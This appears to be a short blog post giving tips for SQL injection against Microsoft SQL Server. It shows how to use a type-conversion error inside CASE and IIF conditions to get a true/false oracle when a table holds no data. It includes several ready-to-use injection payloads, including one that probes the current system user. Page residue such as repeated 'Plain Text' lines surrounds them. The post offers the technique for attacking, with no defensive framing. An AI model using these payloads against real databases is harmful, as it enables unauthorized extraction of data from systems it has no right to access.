-->
Home
Sql Injection

A SQL Server Conditional Statement Injection Tips



Preface 

During injection, you may encounter a situation, that is, there is injection. However, there is no data in the table, which causes you to fail to perform the Boolean injection. So you can use this method to obtain mysql statements case when 1 like 1 then 0 else 2*1e308 end similar effect. The methods used here are both errors that occur when data types are inconsistent and then compared. This forces the Boolean effect to be displayed.



Plain Text


Plain Text


Plain Text

CASE Conditional Statement 

example 1

SQL: select * from article WHERE id=1 and 1=(CASE WHEN 1=1 THEN 1 ELSE 'x' END)


SQL :select * from article WHERE id=1 and 1=(CASE WHEN 1=2 THEN 1 ELSE 'x' END);


In this way, the forced Boolean result can be achieved.

CASE Conditional Statement

SQL :select * from article WHERE id=1 and 1=(CASE WHEN system_user like '%sa%' THEN 1 ELSE 'x' END)


SQL :select * from article WHERE id=1 and 1=(CASE WHEN system_user like '% aaaaa %' THEN 1 ELSE 'x' END)

IIF Conditional Statement

SQL :select * from article WHERE id=1 and 1=IIF(1=1,1,'x');


SQL :select * from article WHERE id=1 and 1=IIF(1=2,1,'x');


IIF Conditional Statement

   



1 comment

  1. This comment has been removed by a blog administrator.